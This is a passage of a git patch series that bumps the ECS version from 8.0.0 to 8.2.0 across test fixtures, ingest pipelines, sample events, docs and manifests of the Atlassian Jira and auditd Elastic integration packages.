{ - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5145,7 +5145,7 @@ { "@timestamp": "2021-11-22T00:06:59.313Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5214,7 +5214,7 @@ { "@timestamp": "2021-11-22T00:06:59.266Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5288,7 +5288,7 @@ { "@timestamp": "2021-11-22T00:06:59.224Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5362,7 +5362,7 @@ { "@timestamp": "2021-11-22T00:06:58.990Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5419,7 +5419,7 @@ { "@timestamp": "2021-11-22T00:06:58.974Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5488,7 +5488,7 @@ { "@timestamp": "2021-11-22T00:06:58.318Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5557,7 +5557,7 @@ { "@timestamp": "2021-11-22T00:06:57.162Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5631,7 +5631,7 @@ { "@timestamp": "2021-11-22T00:06:57.158Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5705,7 +5705,7 @@ { "@timestamp": "2021-11-22T00:06:57.138Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5779,7 +5779,7 @@ { "@timestamp": "2021-11-22T00:06:49.756Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5855,7 +5855,7 @@ { "@timestamp": "2021-11-22T00:06:49.754Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5929,7 +5929,7 @@ { "@timestamp": "2021-11-22T00:06:49.752Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6003,7 +6003,7 @@ { "@timestamp": "2021-11-22T00:06:49.751Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6077,7 +6077,7 @@ { "@timestamp": "2021-11-22T00:06:49.750Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6151,7 +6151,7 @@ { "@timestamp": "2021-11-22T00:06:49.734Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6227,7 +6227,7 @@ { "@timestamp": "2021-11-22T00:06:49.600Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6322,7 +6322,7 @@ { "@timestamp": "2021-11-22T00:05:08.596Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6415,7 +6415,7 @@ { "@timestamp": "2021-11-22T00:05:08.584Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6489,7 +6489,7 @@ { "@timestamp": "2021-11-22T00:05:08.583Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6563,7 +6563,7 @@ { "@timestamp": "2021-11-22T00:05:08.581Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6637,7 +6637,7 @@ { "@timestamp": "2021-11-22T00:05:08.579Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6711,7 +6711,7 @@ { "@timestamp": "2021-11-22T00:05:08.514Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6776,7 +6776,7 @@ { "@timestamp": "2021-11-28T18:18:26.076Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6848,7 +6848,7 @@ { "@timestamp": "2021-11-28T18:23:20.278Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6927,7 +6927,7 @@ { "@timestamp": "2021-11-28T18:23:13.741Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index a6616341249..c517829e254 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-11-22T00:05:08.514Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -69,7 +69,7 @@ { "@timestamp": "2021-11-22T00:05:08.579Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -145,7 +145,7 @@ { "@timestamp": "2021-11-22T00:05:08.581Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -221,7 +221,7 @@ { "@timestamp": "2021-11-22T00:05:08.583Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -297,7 +297,7 @@ { "@timestamp": "2021-11-22T00:05:08.584Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -373,7 +373,7 @@ { "@timestamp": "2021-11-22T00:05:08.596Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -468,7 +468,7 @@ { "@timestamp": "2021-11-22T00:06:49.600Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -564,7 +564,7 @@ { "@timestamp": "2021-11-22T00:06:49.734Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -640,7 +640,7 @@ { "@timestamp": "2021-11-22T00:06:49.750Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -716,7 +716,7 @@ { "@timestamp": "2021-11-22T00:06:49.751Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -792,7 +792,7 @@ { "@timestamp": "2021-11-22T00:06:49.752Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -868,7 +868,7 @@ { "@timestamp": "2021-11-22T00:06:49.754Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -944,7 +944,7 @@ { "@timestamp": "2021-11-22T00:06:49.756Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1020,7 +1020,7 @@ { "@timestamp": "2021-11-22T00:06:57.138Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1095,7 +1095,7 @@ { "@timestamp": "2021-11-22T00:06:57.158Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1170,7 +1170,7 @@ { "@timestamp": "2021-11-22T00:06:57.162Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1245,7 +1245,7 @@ { "@timestamp": "2021-11-22T00:06:58.318Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1315,7 +1315,7 @@ { "@timestamp": "2021-11-22T00:06:58.974Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1385,7 +1385,7 @@ { "@timestamp": "2021-11-22T00:06:58.990Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1443,7 +1443,7 @@ { "@timestamp": "2021-11-22T00:06:59.224Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1518,7 +1518,7 @@ { "@timestamp": "2021-11-22T00:06:59.266Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1593,7 +1593,7 @@ { "@timestamp": "2021-11-22T00:06:59.313Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1663,7 +1663,7 @@ { "@timestamp": "2021-11-22T00:06:59.332Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1721,7 +1721,7 @@ { "@timestamp": "2021-11-22T00:06:59.340Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1779,7 +1779,7 @@ { "@timestamp": "2021-11-22T00:06:59.485Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1842,7 +1842,7 @@ { "@timestamp": "2021-11-22T00:06:59.522Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1917,7 +1917,7 @@ { "@timestamp": "2021-11-22T00:07:01.644Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1992,7 +1992,7 @@ { "@timestamp": "2021-11-22T00:07:01.669Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2067,7 +2067,7 @@ { "@timestamp": "2021-11-22T00:07:02.694Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2142,7 +2142,7 @@ { "@timestamp": "2021-11-22T00:07:02.725Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2217,7 +2217,7 @@ { "@timestamp": "2021-11-22T00:07:02.794Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2292,7 +2292,7 @@ { "@timestamp": "2021-11-22T00:07:09.370Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2355,7 +2355,7 @@ { "@timestamp": "2021-11-22T00:07:09.880Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2430,7 +2430,7 @@ { "@timestamp": "2021-11-22T00:08:33.534Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2495,7 +2495,7 @@ { "@timestamp": "2021-11-22T00:08:33.535Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2560,7 +2560,7 @@ { "@timestamp": "2021-11-22T00:08:33.536Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2625,7 +2625,7 @@ { "@timestamp": "2021-11-22T00:08:33.537Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2690,7 +2690,7 @@ { "@timestamp": "2021-11-22T00:08:33.710Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2770,7 +2770,7 @@ { "@timestamp": "2021-11-22T00:08:33.732Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2840,7 +2840,7 @@ { "@timestamp": "2021-11-22T00:08:33.746Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2903,7 +2903,7 @@ { "@timestamp": "2021-11-22T00:08:33.887Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2998,7 +2998,7 @@ { "@timestamp": "2021-11-22T00:08:34.720Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3061,7 +3061,7 @@ { "@timestamp": "2021-11-22T00:08:34.142Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3131,7 +3131,7 @@ { "@timestamp": "2021-11-22T00:08:34.151Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3201,7 +3201,7 @@ { "@timestamp": "2021-11-22T00:08:34.163Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3271,7 +3271,7 @@ { "@timestamp": "2021-11-22T00:08:34.165Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3341,7 +3341,7 @@ { "@timestamp": "2021-11-22T00:08:34.166Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3411,7 +3411,7 @@ { "@timestamp": "2021-11-22T00:08:34.168Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3481,7 +3481,7 @@ { "@timestamp": "2021-11-22T00:08:34.171Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3551,7 +3551,7 @@ { "@timestamp": "2021-11-22T00:08:34.173Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3626,7 +3626,7 @@ { "@timestamp": "2021-11-22T00:08:34.174Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3696,7 +3696,7 @@ { "@timestamp": "2021-11-22T00:08:34.176Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3766,7 +3766,7 @@ { "@timestamp": "2021-11-22T00:08:34.178Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3836,7 +3836,7 @@ { "@timestamp": "2021-11-22T00:08:34.180Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3906,7 +3906,7 @@ { "@timestamp": "2021-11-22T00:08:34.182Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3976,7 +3976,7 @@ { "@timestamp": "2021-11-22T00:08:34.184Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4051,7 +4051,7 @@ { "@timestamp": "2021-11-22T00:08:34.187Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4121,7 +4121,7 @@ { "@timestamp": "2021-11-22T00:08:34.190Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4191,7 +4191,7 @@ { "@timestamp": "2021-11-22T00:08:34.204Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4266,7 +4266,7 @@ { "@timestamp": "2021-11-22T00:08:34.208Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4336,7 +4336,7 @@ { "@timestamp": "2021-11-22T00:08:34.210Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4411,7 +4411,7 @@ { "@timestamp": "2021-11-22T00:08:34.212Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4486,7 +4486,7 @@ { "@timestamp": "2021-11-22T00:08:34.215Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4556,7 +4556,7 @@ { "@timestamp": "2021-11-22T00:08:34.217Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4631,7 +4631,7 @@ { "@timestamp": "2021-11-22T00:08:34.219Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4701,7 +4701,7 @@ { "@timestamp": "2021-11-22T00:08:34.221Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4776,7 +4776,7 @@ { "@timestamp": "2021-11-22T00:08:34.223Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4846,7 +4846,7 @@ { "@timestamp": "2021-11-22T00:08:34.225Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4916,7 +4916,7 @@ { "@timestamp": "2021-11-22T00:08:34.227Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4991,7 +4991,7 @@ { "@timestamp": "2021-11-22T00:08:34.229Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5061,7 +5061,7 @@ { "@timestamp": "2021-11-22T00:08:34.231Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5136,7 +5136,7 @@ { "@timestamp": "2021-11-22T00:08:34.233Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5206,7 +5206,7 @@ { "@timestamp": "2021-11-22T00:08:34.235Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5276,7 +5276,7 @@ { "@timestamp": "2021-11-22T00:08:34.236Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5346,7 +5346,7 @@ { "@timestamp": "2021-11-22T00:08:34.239Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5416,7 +5416,7 @@ { "@timestamp": "2021-11-22T00:08:34.241Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5486,7 +5486,7 @@ { "@timestamp": "2021-11-22T00:08:34.243Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5556,7 +5556,7 @@ { "@timestamp": "2021-11-22T00:08:34.249Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5637,7 +5637,7 @@ { "@timestamp": "2021-11-22T00:08:34.266Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5700,7 +5700,7 @@ { "@timestamp": "2021-11-22T00:08:34.297Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5794,7 +5794,7 @@ { "@timestamp": "2021-11-22T00:08:34.506Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5864,7 +5864,7 @@ { "@timestamp": "2021-11-22T00:08:34.521Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5939,7 +5939,7 @@ { "@timestamp": "2021-11-22T00:08:34.535Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6014,7 +6014,7 @@ { "@timestamp": "2021-11-22T00:08:34.543Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6089,7 +6089,7 @@ { "@timestamp": "2021-11-22T00:08:34.545Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6159,7 +6159,7 @@ { "@timestamp": "2021-11-22T00:12:02.856Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6231,7 +6231,7 @@ { "@timestamp": "2021-11-26T19:35:10.718Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6307,7 +6307,7 @@ { "@timestamp": "2021-11-26T19:33:29.363Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index f1f95b9a441..05b6e111e62 100644 --- a/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/atlassian_jira/data_stream/audit/sample_event.json b/packages/atlassian_jira/data_stream/audit/sample_event.json index d70d5ea8d1f..3019d2e1cdf 100644 --- a/packages/atlassian_jira/data_stream/audit/sample_event.json +++ b/packages/atlassian_jira/data_stream/audit/sample_event.json @@ -13,7 +13,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/atlassian_jira/docs/README.md b/packages/atlassian_jira/docs/README.md index 7a6da0635df..3d35249e477 100644 --- a/packages/atlassian_jira/docs/README.md +++ b/packages/atlassian_jira/docs/README.md @@ -113,7 +113,7 @@ An example event for `audit` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/atlassian_jira/manifest.yml b/packages/atlassian_jira/manifest.yml index fbc8135926d..e9a73a3bb43 100644 --- a/packages/atlassian_jira/manifest.yml +++ b/packages/atlassian_jira/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: atlassian_jira title: Atlassian Jira -version: 1.1.0 +version: 1.2.0 license: basic description: Collect logs from Atlassian Jira with Elastic Agent. type: integration From 3194d8ed359d077f94de2aa8f4b8b497e262cfd5 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 12:39:14 -0600 Subject: [PATCH 06/23] Update auditd to ECS 8.2 --- packages/auditd/_dev/build/build.yml | 2 +- packages/auditd/changelog.yml | 5 + .../test-auditd-raw.log-expected.json | 92 +++++++++---------- .../test-auditd-useradd.log-expected.json | 16 ++-- .../test-truncated-execve.log-expected.json | 8 +- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../auditd/data_stream/log/sample_event.json | 2 +- packages/auditd/docs/README.md | 2 +- packages/auditd/manifest.yml | 2 +- 9 files changed, 68 insertions(+), 63 deletions(-) diff --git a/packages/auditd/_dev/build/build.yml b/packages/auditd/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/auditd/_dev/build/build.yml +++ b/packages/auditd/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/auditd/changelog.yml b/packages/auditd/changelog.yml index b0b3c953453..ff57fd06688 100644 --- a/packages/auditd/changelog.yml +++ b/packages/auditd/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "2.1.0" changes: - description: Store EXECVE arguments in process.args array. diff --git a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json index 311d3b3c551..f17c0642f97 100644 --- a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json +++ b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json @@ -15,7 +15,7 @@ "address": "192.168.0.0" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "mac_ipsec_event", @@ -50,7 +50,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "syscall", @@ -119,7 +119,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -175,7 +175,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -243,7 +243,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -275,7 +275,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "proctitle", @@ -295,7 +295,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "proctitle", @@ -322,7 +322,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -364,7 +364,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -402,7 +402,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -437,7 +437,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "execve", @@ -465,7 +465,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -497,7 +497,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -545,7 +545,7 @@ "runtime": "kvm" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -587,7 +587,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -630,7 +630,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -669,7 +669,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -712,7 +712,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -751,7 +751,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -797,7 +797,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -843,7 +843,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -889,7 +889,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -937,7 +937,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -982,7 +982,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1049,7 +1049,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1118,7 +1118,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1165,7 +1165,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1208,7 +1208,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1251,7 +1251,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1284,7 +1284,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1335,7 +1335,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1386,7 +1386,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1436,7 +1436,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1481,7 +1481,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1529,7 +1529,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1573,7 +1573,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1635,7 +1635,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1705,7 +1705,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1752,7 +1752,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -1786,7 +1786,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "cwd", @@ -1816,7 +1816,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "path", @@ -1840,7 +1840,7 @@ "log": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "unknown[1329]", @@ -1870,7 +1870,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "bprm_fcaps", @@ -1890,7 +1890,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "sockaddr", @@ -1910,7 +1910,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "ckaddr", @@ -1930,7 +1930,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ diff --git a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json index 7eb8d46f426..45c95251dd6 100644 --- a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json +++ b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json @@ -14,7 +14,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -70,7 +70,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -125,7 +125,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -181,7 +181,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -239,7 +239,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -287,7 +287,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -343,7 +343,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ @@ -395,7 +395,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": [ diff --git a/packages/auditd/data_stream/log/_dev/test/pipeline/test-truncated-execve.log-expected.json b/packages/auditd/data_stream/log/_dev/test/pipeline/test-truncated-execve.log-expected.json index ceeb55f1d34..b61f7b166a7 100644 --- 